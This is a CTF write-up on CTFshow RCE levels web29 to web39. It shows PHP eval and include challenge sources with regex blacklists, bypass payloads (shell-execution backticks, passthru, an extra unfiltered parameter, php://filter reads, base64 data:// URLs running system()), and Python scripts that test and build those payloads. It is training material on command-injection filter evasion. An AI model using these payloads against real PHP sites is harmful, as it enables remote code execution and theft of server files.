CTFshow-web-vip-RCE-29-39 (blacklist bypass, pseudo-protocols / PHP stream wrappers)

web29 - blacklist bypass

Solution 1: the nl command

nl prints a file with line numbers in front of each line, so it reads flag.php just as cat would; with no file argument it reads from stdin, which is why an interactive nl looks as if it is waiting for input.
But typing nl directly doesn't seem to output the file contents; not sure whether I'm doing something wrong.
  • echo `nl flag.php`; or echo `nl f""lag.php`; (the backticks are PHP's shell-execution operator and were dropped by the page's rendering; only the second form gets past the /flag/i check, because the empty "" is removed by the shell but breaks the literal "flag" that preg_match looks for)

web29 source (the listing highlight_file prints for index.php, not the content of flag.php):
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){ // case-insensitive match
eval($c);
}

}else{
highlight_file(__FILE__);
}

Solution 2: variant payloads

  • show_source(base64_decode("ZmxhZy5waHA="));   (the base64 decodes to flag.php, so "flag" never appears in c)
  • echo `tac fla*`;   (shell glob; again the backticks are PHP's shell-execution operator)
  • show_source(next(array_reverse(scandir("."))));   (scandir sorts ascending; assuming the directory holds only ".", "..", flag.php and index.php, the reversed list is index.php, flag.php, "..", ".", and next() returns its second element, flag.php)
  • echo exec("cat f\lag.p\hp");   (the shell strips the backslashes, so the command that runs is cat flag.php while the literal "flag" never appears in c; exec() returns only the last line of output, which here is the $flag assignment)

Some other interesting ideas

1. Create a new parameter to carry the RCE

Notice that the source only WAFs the value of c: if(!preg_match("/flag/i", $c)). If we send c=include$_GET[1], nothing in c trips the filter, and we have effectively created a second parameter that is not filtered at all. Almost any shell can go through that parameter, including connecting with AntSword.

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

include is a language construct, so it needs no parentheses, and the ?> closes PHP mode inside eval(), so no semicolon is needed either. The php://filter wrapper returns flag.php base64-encoded instead of executing it, which matters because the flag sits in a variable ($flag=...) and a plain include would print nothing.

2. Use cp to copy the flag somewhere readable

CTFs really do call for some creative thinking.

?c=system("cp fl*g.php a.txt");

Then request a.txt over HTTP (cp writes to the script's working directory, assumed here to be the web root); as a .txt the server serves the source instead of executing it.

web30 - blacklist bypass

Solution 2 above still works; here we try replacing system.

A few more words are blocked: system is gone, and so is php (which kills the literal flag.php and any php:// wrapper inside c), but passthru or shell_exec still work:

  • passthru("cat f\lag.p\hp");
  • echo shell_exec("cat fl\ag*");
  • echo `nl fl''ag.p''hp`;   (backticks as before; the empty '' pairs are removed by the shell but split both "flag" and "php" for the regex)
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}

web31 - blacklist bypass

Again more words are blocked (cat, sort, shell, the dot, the single quote) plus the space, but that's no obstacle:

  • c=eval($_GET["1"]);&1=echo shell_exec("tac flag.php");   (the filter sees only c; the inner eval runs parameter 1, which is never checked)
  • c=passthru("tac%09fla*");   (%09 is a tab, which the shell accepts as a word separator in place of the blocked space; tac replaces the blocked cat)
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

web32 - filter

The backtick, echo, ; and ( are now blocked too, so no function call of any kind survives. File inclusion still works because include needs neither parentheses nor a semicolon when ?> ends the statement:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

web33 - filter

The double quote joins the blacklist. The payload never used one ($_GET[1] needs no quotes), so it is unchanged:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 02:22:27
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Base64 returned by the filter; decoded it is the source of flag.php, whose last line is $flag="ctfshow{c31a6ac2-cfa9-42f7-b425-26ac11a86615}";

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YzMxYTZhYzItY2ZhOS00MmY3LWI0MjUtMjZhYzExYTg2NjE1fSI7DQo=

web34 - filter

The colon is added. It only appears in php://filter, which lives in parameter 1, not in c, so the same payload works:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php


<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:29
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

web35 - filter

< and = are added. The closing tag ?> contains neither, and the = signs all sit in parameter 1, so nothing changes:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:23
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
Base64 returned by the filter; decoded it ends in $flag="ctfshow{fd846a10-2d72-428e-a2f0-2dd4ae6a429e}";

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZmQ4NDZhMTAtMmQ3Mi00MjhlLWEyZjAtMmRkNGFlNmE0MjllfSI7

web36 - filter

The slash and all digits are now blocked, so $_GET[1] no longer passes; any non-numeric, unquoted parameter name does:

c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:16
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
Base64 returned by the filter; decoded it ends in $flag="ctfshow{a5b0646c-af84-4d12-a5cf-fd201aa217c5}";

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTViMDY0NmMtYWY4NC00ZDEyLWE1Y2YtZmQyMDFhYTIxN2M1fSI7
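The following Python harness is an added example, not part of the original write-up or of CTFshow: it copies the eight blacklists from the web29 to web36 sources above into Python regexes and models the request handling of the challenge (PHP-style query-string parsing, then preg_match on c only), so you can check which of the payloads used above survive which level and see that the parameter carrying the real payload is never inspected. The payload strings are the ones from this page; nothing about the CTF server beyond the visible source is assumed.

```python
import re
from urllib.parse import unquote_plus

# Blacklists copied from the web29..web36 sources on this page. PHP's /i flag
# becomes re.IGNORECASE; the alternations are plain PCRE that Python's re accepts.
LEVELS = {
    "web29": r"flag",
    "web30": r"flag|system|php",
    "web31": r"flag|system|php|cat|sort|shell|\.| |\'",
    "web32": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(",
    "web33": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"",
    "web34": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"",
    "web35": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=",
    "web36": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in LEVELS.items()}


def passes(level: str, c: str) -> bool:
    """True when preg_match() finds nothing in c, i.e. eval($c) is reached."""
    return COMPILED[level].search(c) is None


def first_failing_level(c: str):
    """Name of the first level (in page order) whose blacklist catches c; None if it passes all."""
    for name in LEVELS:
        if not passes(name, c):
            return name
    return None


def parse_get(query: str) -> dict:
    """Model PHP's $_GET: split on '&', split each pair at its first '=', then
    URL-decode both halves ('+' and %XX, so %09 becomes a tab)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def eval_gate(level: str, query: str):
    """Replay one request against a level. Only c is checked, exactly as in the
    challenge source; every other parameter reaches the eval'd code untouched.
    Returns (reaches_eval, c, other_params)."""
    params = parse_get(query)
    c = params.get("c", "")
    others = {k: v for k, v in params.items() if k != "c"}
    return passes(level, c), c, others


if __name__ == "__main__":
    # Payloads taken from this write-up, in the form they have after URL decoding.
    for payload in [
        'show_source(next(array_reverse(scandir("."))));',
        'echo `nl f""lag.php`;',
        'passthru("tac\tfla*");',
        "include$_GET[1]?>",
        "include$_GET[a]?>",
    ]:
        print(f"{payload!r:55} first blocked at: {first_failing_level(payload)}")
    ok, c, rest = eval_gate(
        "web36", "c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php"
    )
    print("web36 c passes:", ok, "| parameter a, never filtered:", rest["a"])
```

Run it and the progression of the write-up falls out of the table: the scandir trick dies at web31 (the dot), the backtick payloads at web30 (php) or web32, include$_GET[1]?> survives until web36 adds [0-9], and include$_GET[a]?> survives everything, while the php://filter string in parameter a would be rejected at every level from web30 on if it were ever examined.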

web37 - data protocol

This level uses include() instead of eval(), and only "flag" is blacklisted. Anything include() can open is fair game, so hand it a data: URL that contains PHP code; the code runs and its system() output is the flag. Including a data: URL needs allow_url_include=On in php.ini, which the challenge evidently has.

  • c=data://text/plain,   (the inline PHP after the comma is missing on the page; the base64 form below is the complete one)
  • c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=   (decodes to <?php system("tac flag.php") ?>; "flag" is hidden inside the base64, so the regex never sees it)
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}

web38 - data protocol

php and file are added, which rules out the literal flag.php, file:// and php://filter. The base64 data: URL contains none of those words (it decodes to <?php system('cat flag.php');?>), so it still goes straight through:

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}

web39 - data protocol

Only "flag" is blocked, but include() now appends ".php" to c. With a data: URL that does no harm: the suffix is appended to the data itself, lands after the closing ?> and is simply echoed as text, while the code in front of it runs as before. Since c is still checked, the command inside must avoid the literal "flag" (a glob such as fla*, as in the earlier levels).

c=data://text/plain,   (the PHP after the comma is missing on the page)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
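Added example for web37 to web39 (Python, written for this page; it is not the write-up's or CTFshow's code): it builds the data: URL payloads, checks them against the include() blacklists copied from the three sources above, shows what PHP's data wrapper hands to include() once web39 appends ".php", and decodes the base64 that php://filter returned in web33 to web36. The code/text splitter is a deliberate simplification of PHP's parser (it only recognises the <?php ... ?> tag pair), and the sample inputs are the payloads and outputs from this page.

```python
import base64
import re

# Blacklists copied from the web37..web39 sources on this page (PHP /i -> IGNORECASE).
INCLUDE_LEVELS = {
    "web37": r"flag",
    "web38": r"flag|php|file",
    "web39": r"flag",
}


def reaches_include(level: str, c: str) -> bool:
    """True when preg_match() finds nothing in c, i.e. include() runs on it."""
    return re.search(INCLUDE_LEVELS[level], c, re.IGNORECASE) is None


def data_url(php_source: str, use_base64: bool = True) -> str:
    """Build the ?c= value: an RFC 2397 data: URL carrying PHP source.
    With base64 the words 'php', 'flag' and 'file' inside the source never
    appear literally, which is what gets past web38's blacklist."""
    if use_base64:
        return "data://text/plain;base64," + base64.b64encode(php_source.encode()).decode()
    # PHP also URL-decodes a plain-text body; none of the payloads here contain '%'.
    return "data://text/plain," + php_source


def data_url_body(c: str) -> str:
    """What PHP's data wrapper hands to include(): the decoded body after the comma."""
    header, _, body = c.partition(",")
    if header.endswith(";base64"):
        return base64.b64decode(body).decode()
    return body


def code_vs_text(script: str):
    """Split a script the way the PHP parser does: <?php ... ?> blocks execute,
    everything outside them is echoed verbatim. Returns (code_blocks, literal_text).
    Simplified: only the <?php ... ?> tag pair is handled."""
    code = [m.strip() for m in re.findall(r"<\?php(.*?)\?>", script, re.DOTALL)]
    literal = re.sub(r"<\?php.*?\?>", "", script, flags=re.DOTALL)
    return code, literal


def web39_effect(c: str):
    """web39 does include($c . '.php'). Show where that suffix ends up."""
    return code_vs_text(data_url_body(c + ".php"))


def flag_from_filter_output(b64: str):
    """Decode what php://filter/read=convert.base64-encode returned (web33-36)
    and extract the value assigned to $flag, or None if there is none."""
    src = base64.b64decode(b64).decode()
    m = re.search(r'\$flag\s*=\s*"([^"]*)"', src)
    return m.group(1) if m else None


if __name__ == "__main__":
    web38 = data_url("<?php system('cat flag.php');?>")
    print(web38, "-> reaches include():", reaches_include("web38", web38))
    # web39: a plain-text body is inspected as-is, so the command uses a glob
    web39 = data_url('<?php system("tac fla*");?>', use_base64=False)
    print("web39 passes:", reaches_include("web39", web39), "| after .php suffix:", web39_effect(web39))
```

The web38 call reproduces the exact base64 string used on this page, and web39_effect shows that the appended suffix ends up as the literal text ".php" after the executed block, which is why the suffix does not break the payload.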